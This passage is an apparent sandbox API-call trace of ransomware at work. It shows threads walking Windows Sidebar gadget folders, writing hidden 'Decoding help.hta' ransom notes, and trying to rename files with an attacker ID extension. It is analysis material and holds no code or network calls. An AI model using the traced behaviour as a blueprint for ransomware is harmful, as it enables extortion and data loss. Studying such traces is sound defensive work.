lpNumberOfBytesWritten=0x2254fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.501] CloseHandle (hObject=0xd3c) returned 1 [0061.502] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.502] lstrcmpiW (lpString1="Decoding help.hta", lpString2="1.png") returned 1 [0061.502] lstrlenW (lpString="1.png") returned 5 [0061.502] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*" [0061.502] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\*.*") returned 70 [0061.502] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\", lpString2="1.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1.png" [0061.502] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1.png" [0061.502] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.502] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\1.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\1.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0062.525] FindNextFileW (in: hFindFile=0x24558728, lpFindFileData=0x2254fd30 | out: lpFindFileData=0x2254fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x867e8f60, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x867e8f60, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x2aa9137b, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1551, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.png", cAlternateFileName="")) returned 1 Thread: id = 985 os_tid = 0x508 [0060.260] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*", lpFindFileData=0x22b8fd30 | out: lpFindFileData=0x22b8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23730c68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x245586e8 [0060.265] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.265] FindNextFileW (in: hFindFile=0x245586e8, lpFindFileData=0x22b8fd30 | out: lpFindFileData=0x22b8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23730c68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.265] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.266] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.266] FindNextFileW (in: hFindFile=0x245586e8, lpFindFileData=0x22b8fd30 | out: lpFindFileData=0x22b8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x119103a1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x119103a1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1216, dwReserved0=0x0, dwReserved1=0x0, cFileName="cpu.html", cAlternateFileName="")) returned 1 [0060.266] lstrcpyW (in: lpString1=0x5c98390, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*" [0060.266] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*") returned 65 [0060.266] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\Decoding help.hta" [0060.266] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\decoding help.hta")) returned 0xffffffff [0060.266] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x924 [0060.615] WriteFile (in: hFile=0x924, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x22b8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x22b8fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.616] CloseHandle (hObject=0x924) returned 1 [0060.616] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0060.617] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cpu.html") returned 1 [0060.617] lstrlenW (lpString="cpu.html") returned 8 [0060.617] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*" [0060.617] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*") returned 65 [0060.617] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\", lpString2="cpu.html" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html" [0060.617] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html" [0060.617] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html.[ID]g9uZrLhJaygpwRm1[ID]" [0060.617] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\cpu.html"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\cpu.html.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\en-us\\cpu.html.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.617] FindNextFileW (in: hFindFile=0x245586e8, lpFindFileData=0x22b8fd30 | out: lpFindFileData=0x22b8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23730c68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="css", cAlternateFileName="")) returned 1 [0060.617] lstrcmpW (lpString1=".", lpString2="css") returned -1 [0060.617] lstrcmpW (lpString1="..", lpString2="css") returned -1 [0060.617] lstrcmpiW (lpString1="windows", lpString2="css") returned 1 [0060.617] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*" [0060.617] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*") returned 65 [0060.617] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\", lpString2="css" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css" [0060.617] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\css\\*.*" [0060.617] GlobalMemoryStatus (in: lpBuffer=0x22b8fd10 | out: lpBuffer=0x22b8fd10) [0060.830] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2528fe40, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x984 [0064.502] CloseHandle (hObject=0x984) returned 1 [0064.502] FindNextFileW (in: hFindFile=0x245586e8, lpFindFileData=0x22b8fd30 | out: lpFindFileData=0x22b8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x3e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="gadget.xml", cAlternateFileName="")) returned 1 Thread: id = 986 os_tid = 0x9d4 [0060.263] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*", lpFindFileData=0x22f4fd30 | out: lpFindFileData=0x22f4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8057bdba, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8057bdba, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x245587a8 [0060.271] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0060.271] FindNextFileW (in: hFindFile=0x245587a8, lpFindFileData=0x22f4fd30 | out: lpFindFileData=0x22f4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8057bdba, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8057bdba, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.271] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0060.271] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0060.271] FindNextFileW (in: hFindFile=0x245587a8, lpFindFileData=0x22f4fd30 | out: lpFindFileData=0x22f4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x842ddbeb, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x842ddbeb, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x290d46f5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x42e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="back.png", cAlternateFileName="")) returned 1 [0060.271] lstrcpyW (in: lpString1=0x5ca0398, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0060.271] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 66 [0060.271] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" [0060.271] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\decoding help.hta")) returned 0xffffffff [0060.271] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd3c [0061.487] WriteFile (in: hFile=0xd3c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x22f4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x22f4fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0061.488] CloseHandle (hObject=0xd3c) returned 1 [0061.488] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0061.488] lstrcmpiW (lpString1="Decoding help.hta", lpString2="back.png") returned 1 [0061.488] lstrlenW (lpString="back.png") returned 8 [0061.488] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0061.488] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 66 [0061.488] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="back.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png" [0061.488] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png" [0061.488] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.488] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\back.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\back.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.488] FindNextFileW (in: hFindFile=0x245587a8, lpFindFileData=0x22f4fd30 | out: lpFindFileData=0x22f4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x842b7a8e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x842b7a8e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x290fa853, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x6651, dwReserved0=0x0, dwReserved1=0x0, cFileName="back_lrg.png", cAlternateFileName="")) returned 1 [0061.488] lstrcpyW (in: lpString1=0x10fe7630, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0061.489] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 66 [0061.489] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" [0061.489] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\decoding help.hta")) returned 0x1 [0061.489] lstrcmpiW (lpString1="Decoding help.hta", lpString2="back_lrg.png") returned 1 [0061.489] lstrlenW (lpString="back_lrg.png") returned 12 [0061.489] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0061.489] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 66 [0061.489] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="back_lrg.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back_lrg.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back_lrg.png" [0061.489] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back_lrg.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back_lrg.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back_lrg.png" [0061.489] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back_lrg.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back_lrg.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back_lrg.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.489] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back_lrg.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\back_lrg.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\back_lrg.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\back_lrg.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.489] FindNextFileW (in: hFindFile=0x245587a8, lpFindFileData=0x22f4fd30 | out: lpFindFileData=0x22f4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x290fa853, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x290fa853, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x290fa853, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x15a, dwReserved0=0x0, dwReserved1=0x0, cFileName="dial.png", cAlternateFileName="")) returned 1 [0061.489] lstrcpyW (in: lpString1=0x10fe7630, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0061.489] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 66 [0061.489] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" [0061.489] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\decoding help.hta")) returned 0x1 [0061.489] lstrcmpiW (lpString1="Decoding help.hta", lpString2="dial.png") returned -1 [0061.489] lstrlenW (lpString="dial.png") returned 8 [0061.489] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0061.489] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned 66 [0061.489] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\", lpString2="dial.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial.png" [0061.489] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial.png" [0061.490] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.490] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\dial.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\images\\dial.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.490] FindNextFileW (in: hFindFile=0x245587a8, lpFindFileData=0x22f4fd30 | out: lpFindFileData=0x22f4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x842b7a8e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x842b7a8e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29146b0f, 